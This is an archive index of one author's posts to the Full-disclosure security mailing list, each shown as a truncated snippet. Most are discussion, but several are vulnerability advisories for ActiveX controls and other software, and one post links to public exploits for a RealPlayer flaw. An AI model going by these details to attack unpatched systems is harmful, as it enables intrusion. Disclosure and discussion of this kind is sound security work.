Re: [Full-disclosure] server security

2012-06-22 Thread Elazar Broad
+1 The less an attacker knows about your infrastructure the better, as long as you are not solely relying on that obscurity to protect said infrastructure. Consider this: the more an attacker has to poke around because you aren't running certain services on their default port, or say disabling

Re: [Full-disclosure] Fwd: Vulnerability research and exploit writing

2012-04-24 Thread Elazar Broad
Ferenc, I got one as well a few weeks ago. I suspect you are correct in your assumption. elazar On Tuesday, April 24, 2012 at 4:03 AM, Ferenc Kovacs wrote: > >Hi, > >Anybody else got this message? I think they are "spamming" the >subscribers/regular participants of the list. > >-- Forw

Re: [Full-disclosure] Windows XP denial of service 0day found in CTF exercise

2012-04-17 Thread Elazar Broad
Received-SPF: softfail (lists.grok.org.uk: transitioning domain of a...@infosecinstitute.com does not designate 46.167.245.118 as permitted sender) Received: from emkei.cz (emkei.cz [46.167.245.118]) by lists.grok.org.uk (Postfix) with ESMTP id D4324C0 for ;Tue, 17 Apr 20

Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response

2012-01-12 Thread Elazar Broad
"Sounds like this industry could benefit from these kids even more since they are driving home the points you all are supposed to be warning them about." That's because these kids don't have mouths to feed and a paycheck to worry about. Ethics and ethos are all very nice when you have

Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”

2011-10-10 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The report states that they have been using flash drives for map and video data transfer. The source is probably some flight operator's personal drive which never came under the microscope, that and "well...it's an *isolated* network so proper security

Re: [Full-disclosure] printers used for espionage

2011-07-12 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://www.eff.org/issues/printers On Tue, 12 Jul 2011 16:48:45 -0400 Jason Ellison wrote: >list, > > Sometime ago I remember reading an article on printers being >used to >gain intelligence in an embassy or government agency. The >printer >had a

Re: [Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release

2011-06-23 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Most people charge for that, the least Juan could do is give you a *free* "license" for his scamware(we know you want it ;) ). Ah, the state of so-called "security" these days...it's sad. elazar On Wed, 22 Jun 2011 23:38:06 -0400 adam wrote: >*coug

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Elazar Broad
>On Mon, Feb 21, 2011 at 9:10 PM, Elazar Broad > wrote: > >> -BEGIN PGP SIGNED MESSAGE- >> Hash: SHA1 >> >> (never start a sentence with)And just to be the grammar douche, >> that should be: >> >> >> With the latTer as the majority o

Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 (never start a sentence with)And just to be the grammar douche, that should be: With the latTer as the majority of course. elazar On Mon, 21 Feb 2011 14:32:36 -0500 Christian Sciberras wrote: >I agree, you should move your business to IRC. They u

Re: [Full-disclosure] vswitches: physical networks obsolete?

2011-02-07 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 We grappled with the same problem when setting up a virtual host in order to mimic our production environment for training purposes. Ultimately, we ended up purchasing a separate box for our DMZ host, it is hard to trust separation in software(granted

Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Just lightly scratching the surface, KeyScrambler.sys is signed by GlobalSign, strings reveals nothing interesting other than OpenSSL 0.9.8a is used. elazar On Thu, 09 Dec 2010 09:26:49 -0500 Gary Baribault wrote: >Call me paranoid, but that sure wo

Re: [Full-disclosure] Android and malware

2010-11-24 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 It is definitely possible(http://www.cultofmac.com/android-app-sends-personal-data-to-china/52929), there have been several well known local root exploits(i.e. http://c-skills.blogspot.com/2010/08/please-hold-line.html) for the Android system, though

Re: [Full-disclosure] virus in email RTF message MS OE almost disabled

2010-11-23 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Putting Phd, CISSP after your name combined with your original request isn't going to get you much love on this list, but then again, so much for the 30,000 ft birds eye academic view of security(and we wonder why the so called *industry* is such a fai

Re: [Full-disclosure] looking for enterprise AV solution

2010-10-27 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 +1 for Vipre, it's cheap(about $10 or less per seat, per year), generally resource conscious and pretty granular centralized policy management and last but not least, its detection and fp to fn ratio is pretty solid. Aside from a recent issues with its

Re: [Full-disclosure] Expired certificate

2010-08-02 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Can't you? The world is full of unpatched systems. You can even find systems where patches are not installed because it is running a piece of mission critical software and they would lose support if they installed any patches (I am not making this up)

Re: [Full-disclosure] Day of bugs in WordPress 2

2010-07-29 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ed or nano? :) On Thu, 29 Jul 2010 20:47:19 -0400 valdis.kletni...@vt.edu wrote: >On Thu, 29 Jul 2010 17:18:28 PDT, Zach C said: >> So if Drupal and WordPress, etc. are so terrible, what would you >all recommend? > >vi or emacs. Take your pick, I'm no

[Full-disclosure] SAPGui BI wadmxhtml.dll Tags Property Heap Corruption

2010-07-15 Thread Elazar Broad
code. Fix - SAP set the kill-bit for this control with Patch 17 for SAPGui. Alternatively, you can set the kill-bit manually, please see http://support.microsoft.com/kb/240797. Credit - Elazar Broad -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This

Re: [Full-disclosure] Stealthier Internet access

2010-05-25 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thermite will definitely do, check out http://hackaday.com/2008/09/16/how-to-thermite-based-hard-drive-anti-forensic-destruction/ and of course a .50 APIT round will do as well: http://www.ranum.com/security/computer_security/editorials/diskcrypt/ind

Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread Elazar Broad
>CLR, etc) >or Native ignores the notion that the client controls hardware, >OS, the >executing process and the network. > >Signals can be intercepted at any layer. > >Any other assertion is ridiculous and a waste of time and effort. > >-Travis > >On Thu,

Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Unless you wrap your service methods with some form of an authentication, your webservices are just as public as any other "world" accessible part of your site. Are the pages calling these services behind any sort of authentication? On Thu, 06 May 20

Re: [Full-disclosure] When is it valid to claim that a vulnerability leads to a remote attack?

2009-10-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, 09 Oct 2009 10:24:02 -0400 Paul Schmehl wrote: >--On Thursday, October 08, 2009 22:16:01 -0500 Jonathan Leffler > wrote: > >> >> A reputable security defect reporting organization is claiming >that a Windows >> program is subject to a remote

Re: [Full-disclosure] What's with www.modsecurity.org

2009-09-06 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Works fine for me... On Sun, 06 Sep 2009 14:23:37 -0400 David Alanis wrote: >Good Day, > >Anyone happen to know what is going on with www.modsecurity.org or > >www.breach.com? > >Cheers, >David > >-

Re: [Full-disclosure] why not a sandbox

2009-09-06 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://www.sandboxie.com/ On Fri, 04 Sep 2009 14:05:24 -0400 RandallM wrote: >how come we just can't sandbox the browser in away from the >system. >its the users that just get gmail and click links, watch youtube >vids >and check FaceBook and Mypace

Re: [Full-disclosure] windows future

2009-08-30 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Like them or not, M$ has done quite a bit with its SDL[1], and though quite late in the game, the memory protection mechanisms in Vista and Windows 7. As far as anti-virus software goes, it's mostly useless[2][there was a recent article on signature l

Re: [Full-disclosure] windows future

2009-08-30 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, 28 Aug 2009 16:34:27 -0400 Paul Schmehl wrote: >--On Friday, August 28, 2009 13:40:28 -0500 Rohit Patnaik > >wrote: > >> >> To be fair, Linux has come a very long way in that regard. I >purchased >> an Asus Eee 900 with Linux preinstalled, a

Re: [Full-disclosure] [Fwd: Re: windows future]

2009-08-30 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, 28 Aug 2009 17:20:09 -0400 Peter Besenbruch wrote: >> > The OS on my machines will not allow a person to run an >administrative >> > desktop. It enforces the separation between the administrator >and a >> > normal user by requiring the creat

Re: [Full-disclosure] ZF05 released

2009-07-29 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 There's a few on Milw0rm(2,3,4 I believe)... On Thu, 30 Jul 2009 00:59:34 -0400 NAHieu wrote: >this is hilarious! > >i am wondering where to get other issues, i.e zf01 --> zf04? > >thanks, >H > >On Wed, Jul 29, 2009 at 8:32 AM, Headenson >John wrote:

Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered

2009-07-16 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I've seen enough RAID controllers take a crap all over all the disks far too many times in my career. http://www.channelregister.co.uk/2009/03/23/carbonite_sues_promise/ Sound familiar? On Thu, 16 Jul 2009 13:52:16 -0400 valdis.kletni...@vt.ed

[Full-disclosure] Autodesk IDrop ActiveX Control Heap Corruption Vulnerability

2009-04-02 Thread Elazar Broad
rded your issue in our tracking database and will determine its priority if/when we determine new investment is required for this technology. Thank You – Autodesk" Timeline: 06/17/2008 - Vendor notified 03/31/2009 - Vendor final response 04/02/2009 - this advisory Credit: Elazar Broad -

Re: [Full-disclosure] BBC cybercrime probe backfires

2009-03-14 Thread Elazar Broad
>'breaking and entering' into their mind? > >-Travis > >On Fri, Mar 13, 2009 at 4:53 PM, Elazar Broad > wrote: >> -BEGIN PGP SIGNED MESSAGE- >> Hash: SHA1 >> >> I am inclined to agree, except that you still have issues with >the >>

Re: [Full-disclosure] BBC cybercrime probe backfires

2009-03-13 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I am inclined to agree, except that you still have issues with the electronic equivalent of breaking and entering. Case in point, there is a good chance you would be arrested and prosecuted if you opened the door to another person's dwelling which did n

[Full-disclosure] Belkin BullDog Plus UPS-Service Buffer Overflow Vulnerability

2009-03-07 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Who: Belkin International, Inc. http://www.belkin.com What: Belkin BullDog Plus UPS Management Software v4.0.2 Build 1219 UPS-Service.exe v1.0.0.1 dated 12/19/2006 How: The UPS management software contains a built-in web server which allows for remo

[Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution

2009-03-03 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Who: Imera(http://www.imera.com) Imera TeamLinks Client(http://teamlinks.imera.com/install.html) What: ImeraIEPlugin.dll Version 1.0.2.54 Dated 12/02/2008 {75CC8584-86D4-4A50-B976-AA72618322C6} http://teamlinks.imera.com/ImeraIEPlugin.cab How:

Re: [Full-disclosure] Oh Yeah, botnet communications

2009-02-23 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ...stealthy infection is trickier. but not impossible, check out Symantec/F-Secure joint analysis of mebroot: https://forums.symantec.com/t5/blogs/blogprintpage/blog-id/malicious_code/article-id/244;jsessionid=A4811540934368155A4B0BEE4D0B0615. Now

Re: [Full-disclosure] Oh Yeah, botnet communications

2009-02-19 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 "You know how the current amateur botnet offerings are basing domain lists off the current time to allow the 'good guys' to prepare?" Shhh, you're gonna wake the " writes all the malware" theorists... On Thu, 19 Feb 2009 23:13:38 -0500 T Biehn wrote:

Re: [Full-disclosure] Windows 7 UAC compromised

2009-02-06 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I maintain that by not educating our users we are failing in that goal. With many it is in one ear, out the other, unless you are allowed to use a clue bat... On Fri, 06 Feb 2009 09:36:32 -0500 Kevin Wilcox wrote: >2009/2/6 Yudi Rosen : > >> But J

Re: [Full-disclosure] Windows 7 UAC compromised

2009-02-06 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Exactly, so we only make him click for non system applets/utilities, and we determine that by digital signatures, which is exactly how UAC is implemented in Windows 7. With that said, now we are back to the original issue, a computer is only as smart(o

Re: [Full-disclosure] e-Holocaust

2009-01-23 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 And you can probably find a majority of those 72 listed here http://www.nsopw.gov... On Fri, 23 Jan 2009 10:24:12 -0500 Miller Grey wrote: >...hehe... > >On Mon, Jan 12, 2009 at 7:50 PM, wrote: > >> On Mon, 12 Jan 2009 09:41:19 PST, Rants nRaves s

Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-31 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 is more cost effective should have been is *it On Wed, 31 Dec 2008 12:57:52 -0500 Elazar Broad wrote: >That's true, keeping up with security is not cheap nor easy. >Tradeoffs are tradeoffs, the question is, when it comes

Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-31 Thread Elazar Broad
c 2008 16:42:47 -0500 valdis.kletni...@vt.edu wrote: >On Tue, 30 Dec 2008 16:13:07 EST, Elazar Broad said: >> And they should have listened then, it was only a matter of time >> before someone fleshed out a practical attack, and that time is >> now. Then again, I am sure there some

Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-30 Thread Elazar Broad
lowing up on internet carders and shutting them down. >> >> On Tue, Dec 30, 2008 at 5:03 PM, Elazar Broad > wrote: >> > -BEGIN PGP SIGNED MESSAGE- >> > Hash: SHA1 >> > >> > SSL/PKI is only as strong as the weakest CA... >> > >

Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-30 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I am waiting for RapidSSL's reaction, then again, $12 certs, you get what you pay for... On Tue, 30 Dec 2008 14:02:11 -0500 James Matthews wrote: >This is going to be fun for all e-commerce sites etc > >On Tue, Dec 30, 2008 at 7

[Full-disclosure] Creating a rogue CA certificate

2008-12-30 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SSL/PKI is only as strong as the weakest CA... For those of you who haven't been following this, here you go: http://www.win.tue.nl/hashclash/rogue-ca/ http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt Enjoy and Happy New Years! elaz

Re: [Full-disclosure] This list has run its course

2008-12-22 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 April Fools isn't for another 4 months... On Mon, 22 Dec 2008 17:53:29 -0500 n3td3v wrote: >Real researchers who should be taken seriously aren't taken >seriously anymore. > >I'm leaving full-disclosure because of the abuse. > >It's just turned into

[Full-disclosure] Barracuda Reputation Block List

2008-12-22 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Barracuda opened this up to the public back in September, see http://www.barracudacentral.org/rbl. I have been using it for about 2 months or so, it seems to be pretty effective. Is anyone else out there using it? What do you think? elazar -BEGIN

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-10 Thread Elazar Broad
. > >You should revisit this opinion after you're out of school and in >the >workforce for 5 years. :) > >On Tue, Dec 9, 2008 at 1:53 PM, Luke Scharf <[EMAIL PROTECTED]> >wrote: > >> Elazar Broad wrote: >> > Neither, because ultimately no one care

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-10 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Financial IT has much competence, the problem is the red tape and politics that many face when trying to get the job done, but then again, you have that everywhere, I am just venting/lamenting over it... On Wed, 10 Dec 2008 12:23:38 -0500 Luke Scharf

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad
Luke Scharf <[EMAIL PROTECTED]> wrote: >Elazar Broad wrote: >> Neither, because ultimately no one cares, and that is why the >> financial industry foots the 60 billion identity theft bill. My >> rant was a little bit of wishful thinking and a shred of belief >in >>

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad
[EMAIL PROTECTED] wrote: >On Tue, 09 Dec 2008 13:26:15 EST, Elazar Broad said: >> I never said we need to do something, passive awareness *can* go >a >> long way... > >Right. The danger is that you want to give the people a *reason* >to >care. > >"If you'

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I never said we need to do something, passive awareness *can* go a long way... On Tue, 09 Dec 2008 13:12:25 -0500 [EMAIL PROTECTED] wrote: >On Tue, 09 Dec 2008 12:20:36 EST, Elazar Broad said: >> Changing the public opinion and mindset m

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad
Following a major cyber-attack, he told legislators, >electricity, >banking, and communications could all go dead, leaving Americans >scrounging >for food, water, gasoline—even hunks of firewood traded on the >black market. > > >On Tue, Dec 9, 2008 at 6:39 AM, Elazar Broad <[EMAI

Re: [Full-disclosure] We're letting the bad guys win

2008-12-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Brilliant use of deflection, keep it up, you might end up as some loser serial rapist on Law and Order, oh wait, they want actors, not the real thing... On Tue, 09 Dec 2008 11:55:08 -0500 n3td3v <[EMAIL PROTECTED]> wrote: >On Tue, Dec 9, 2008 at 3:08

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-08 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 They ain't called beltway bandits for nothing... On Mon, 08 Dec 2008 23:28:52 -0500 "Rafal @ IsHackingYou.com" <[EMAIL PROTECTED]> wrote: >Ivan, all, > >Hold the phone...$5k-$7k to fix an infected device!? Really? >HOLY >CRAP... either that's a c

Re: [Full-disclosure] Project Chroma: A color code for the state ofcyber security

2008-12-02 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad <[EMAIL PROTECTED]> wrote: >Mike C wrote: >> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad <[EMAIL PROTECTED]> >wrote: >> >>> and how does making a color based on these inputs protect >people? >>> >>> >> >> On

Re: [Full-disclosure] Sonicwall license servers down .. all customers affected

2008-12-02 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I stopped using SonicWall when I learned I had to purchase a whole new device for a customer that just wanted to add a few more machines to their network, instead of bumping the license like most "normal" vendors. On Tue, 02 Dec 2008 14:14:43 -0500 IT

Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-28 Thread Elazar Broad
>--On November 26, 2008 1:59:27 AM -0600 Elazar Broad ><[EMAIL PROTECTED]> >wrote: > >> >> -BEGIN PGP SIGNED MESSAGE- >> Hash: SHA1 >> >> Um, NTLM isn't the only 20 or so year old protocol to take the >rap >> recently, I can thin

Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-26 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Um, NTLM isn't the only 20 or so year old protocol to take the rap recently, I can think of a low numbered rfc, lets say 1034 and 1035. Hindsight is 20/20, and 20 years ago, who would have thought that a 16 bit number was way too small for DNS transact

Re: [Full-disclosure] [inbox] Re: Fwd: Comment on: USB devices spreading viruses

2008-11-23 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Symantec's Endpoint Protection has a device control feature which basically functions as you have stated. I haven't really played around with it much, however, it can block devices based on device id... elazar On Mon, 24 Nov 2008 00:17:34 -0500 Bipin

Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC 7368br]

2008-11-15 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 A quick test of OWA 2007 shows that it is not vulnerable... On Sat, 15 Nov 2008 11:36:26 -0500 Micheal Cottingham <[EMAIL PROTECTED]> wrote: >I found and reported this back in 2005/2006. Microsoft told me >that it >had been reported previously and tha

Re: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday

2008-11-06 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What scene... On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v <[EMAIL PROTECTED]> wrote: >i've been monitoring the scene since 1999 so what do you mean no >experience? i make that about 10 years experience if my math is >correct. > >On Fri, Nov 7, 2008 at 1

Re: [Full-disclosure] Securing our computers?

2008-11-04 Thread Elazar Broad
ones ain't that good compared to the Russians. > >Best regards >Michael Boman > >On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad <[EMAIL PROTECTED]> >wrote: >> -BEGIN PGP SIGNED MESSAGE- >> Hash: SHA1 >> >> What's your poison of choice? >>

Re: [Full-disclosure] Securing our computers?

2008-11-03 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What's your poison of choice? On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman <[EMAIL PROTECTED]> wrote: >I already have a drinking game going, awarding myself a drink for >every time n3td3v says something stupid, and every time I play it >I >run out

Re: [Full-disclosure] security industry software license

2008-10-15 Thread Elazar Broad
So take it up with him like a man and not on our inboxes... On Tue, 14 Oct 2008 08:51:33 -0400 n3td3v <[EMAIL PROTECTED]> wrote: >On Tue, Oct 14, 2008 at 1:28 PM, M. B. Jr. ><[EMAIL PROTECTED]> wrote: >> And by the way, why insistently and specifically targeting >Metasploit? > >i don't like hd

Re: [Full-disclosure] To disclose or not to disclose

2008-09-28 Thread Elazar Broad
So the question is, is >that the >ethical choice? Is that a good business choice? > > >Elazar Broad wrote: >> I would opt for #1, additionally, contacting CERT and other >quasi- >> government security organizations would be a plus, they might >have >> better luck lig

Re: [Full-disclosure] To disclose or not to disclose

2008-09-27 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I would opt for #1, additionally, contacting CERT and other quasi- government security organizations would be a plus, they might have better luck lighting a fire under the theoretical vendors ass... elazar On Sat, 27 Sep 2008 03:39:34 + Simon Smi

[Full-disclosure] Webex atucfobj Module ActiveX Control Buffer Overflow Vulnerability

2008-08-06 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Who: Webex http://www.webex.com/ What: Webex Meeting Manager http://support.webex.com/support/downloads.html How: The Webex Meeting Manager utilizes several ActiveX controls, one of which is vulnerable to a stack based buffer overflow. The atucfobj M

Re: [Full-disclosure] Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Vulnerability

2008-07-29 Thread Elazar Broad
On Mon, 28 Jul 2008 13:14:37 -0400 Elazar Broad <[EMAIL PROTECTED]> wrote: >Who: >Trend Micro >http://www.trendmicro.com > >What: >OfficeScan 7.3 build 1343(Patch 4) and older >http://www.trendmicro.com/download/product.asp?productid=5 > >How: >OfficeScan

[Full-disclosure] Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Vulnerability

2008-07-28 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Who: Trend Micro http://www.trendmicro.com What: OfficeScan 7.3 build 1343(Patch 4) and older http://www.trendmicro.com/download/product.asp?productid=5 How: OfficeScan's Web Console utilizes several ActiveX controls when deploying the product throug

[Full-disclosure] Real Networks RealPlayer ActiveX Heap Use After Free Vulnerability

2008-07-25 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Who: Real Networks What: RealPlayer 11 (11.0.0 - 11.0.2 builds 6.0.14.738 - 6.0.14.802) RealPlayer 10.5 (6.0.12.1040-6.0.12.1663, 6.0.12.1698, 6.0.12.1741) RealPlayer 10 RealPlayer Enterprise How: The WindowName and Controls properties of rmoc3260.d

Re: [Full-disclosure] signature for DNS vulnerability?

2008-07-25 Thread Elazar Broad
Or this http://www.emergingthreats.net/content/view/87/1/ On Fri, 25 Jul 2008 14:22:22 -0400 "Albert R. Campa" <[EMAIL PROTECTED]> wrote: >check this out >http://securabit.com/2008/07/24/latest-snort-signature-to-detect- >dns-vulnerability/ > > >On Fri, Jul 25, 2008 at 12:59 PM, crazy frog crazy

Re: [Full-disclosure] [Dailydave] Linux's unofficial security-through-coverup policy

2008-07-17 Thread Elazar Broad
Sorry if I was not clear enough, I meant in the commit comments. I agree, you need about a brain and a half to spot kernel bugs in the code itself... On Thu, 17 Jul 2008 10:58:03 -0400 Paul Schmehl <[EMAIL PROTECTED]> wrote: >--On Thursday, July 17, 2008 10:35:21 -0400 Elazar Broad

Re: [Full-disclosure] [Dailydave] Linux's unofficial security-through-coverup policy

2008-07-17 Thread Elazar Broad
I could understand why Linus is against classifying a commit comment in his branch or in a any unstable branch for that matter...then again, the repositories are open, and anyone with half a brain might be able to discern what has security ramifications or not. On the other hand classifying com

Re: [Full-disclosure] Oracle DB security contact email address?

2008-07-16 Thread Elazar Broad
[EMAIL PROTECTED] http://osvdb.org/vendor/1/Oracle%20Corporation On Wed, 16 Jul 2008 19:22:01 -0400 Kristian Erik Hermansen <[EMAIL PROTECTED]> wrote: >Anyone have it? > >___ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full

Re: [Full-disclosure] DNS and NAT (was: DNS and CheckPoint)

2008-07-11 Thread Elazar Broad
I can confirm the same behavior on a Cisco PIX 501 running 6.3(5). Port numbers are incremented sequentially by one... On Fri, 11 Jul 2008 11:01:33 -0400 Thomas Cross <[EMAIL PROTECTED]> wrote: >Riad, > >Thanks for testing this. A number of other readers wrote me >privately >confirming your

Re: [Full-disclosure] Proxy Autoconfiguration and Internet Explorer Zones

2008-07-10 Thread Elazar Broad
Probably, I completely missed that, and they do seem to be the defaults. I'll test it out tomorrow. Thanks Paul! On Thu, 10 Jul 2008 22:31:56 -0400 Paul Szabo <[EMAIL PROTECTED]> wrote: >Elazar, > >> ... Internet Explorer [with] proxy auto-configuration ... >> The pac file specifies a direct con

[Full-disclosure] Proxy Autoconfiguration and Internet Explorer Zones

2008-07-10 Thread Elazar Broad
I got an interesting issue with Internet Explorer(6 and 7 on Windows XP SP2) and proxy auto-configuration files. I was wondering if anyone has a similar setup and is experiencing behavior like this. My setup is as follows. Client machines are configured to use a PAC file via group policy. The p

Re: [Full-disclosure] Panda ActiveScan 2.0 remote code execution

2008-07-04 Thread Elazar Broad
"We are an impatient lot in this community." - well said... On Fri, 04 Jul 2008 08:59:40 -0400 "Randal T. Rioux" <[EMAIL PROTECTED]> wrote: >On Fri, July 4, 2008 7:02 am, Panda Security Response wrote: >> Please allow at least one week for us to respond before public >> disclosure. We only recei

[Full-disclosure] Autodesk Security Contact

2008-06-16 Thread Elazar Broad
Does anyone have a security contact for Autodesk? elazar

Re: [Full-disclosure] Need some help with management

2008-05-25 Thread Elazar Broad
AIL PROTECTED]> wrote: >--On Friday, May 23, 2008 11:56:15 -0400 Elazar Broad ><[EMAIL PROTECTED]> >wrote: > >> -BEGIN PGP SIGNED MESSAGE- >> Hash: SHA1 >> >> It's not even funny how often this happens. I have a friend who >does >> some consu

Re: [Full-disclosure] AppScan and IDS evasion

2008-05-24 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The out of the box ruleset for SmartDefense on the FW1 does some basic string checking on web traffic(i.e. checking get and post variables for sql injection and xss etc.) along with some strict RFC checks, I don't know to what extent though... Elazar

Re: [Full-disclosure] Need some help with management

2008-05-23 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 It's not even funny how often this happens. I have a friend who does some consulting work for small businesses, and the amount of times that he has come across medical practices that run their billing and record keeping software on the same "fully-loade

Re: [Full-disclosure] Geeks

2008-05-19 Thread Elazar Broad
Yea, and there are plenty that can't even set up their own home network... On Mon, 19 May 2008 15:34:41 -0400 Soldi <[EMAIL PROTECTED]> wrote: >> CISSP's cant hack > >Huh? > >There are plenty of CISSPs you wouldn't want on your bad side. >They just decided to grow up and make a legitimate livi

Re: [Full-disclosure] [NANOG] IOS rootkits

2008-05-18 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Keep in mind that rootkit functionality itself isn't all bad, take anti-virus software for example. It's like a shark trawling the bottom of the sea floor, looking up at its next meal on high; how deeply can you hook the OS core... Elazar On Sun, 18 M

Re: [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap Corruption

2008-04-01 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Now that this is patched... http://milw0rm.com/exploits/5332 http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/realplayer_console.rb Elazar On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad <[EMAIL PROTECTED]> wrote

Re: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game

2008-04-01 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Let the foolz begin :) Happy April 1st! On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION <[EMAIL PROTECTED]> wrote: >FOR IMMEDIATE RELEASE - APR 1, 200(2<<2) > >METASPLOIT CORPORATION ANNOUNCES VERSION 4.0 >OF THE METASPLOIT FRAMEWORK WIT

[Full-disclosure] Real Networks RealPlayer ActiveX Control Heap Corruption

2008-03-09 Thread Elazar Broad
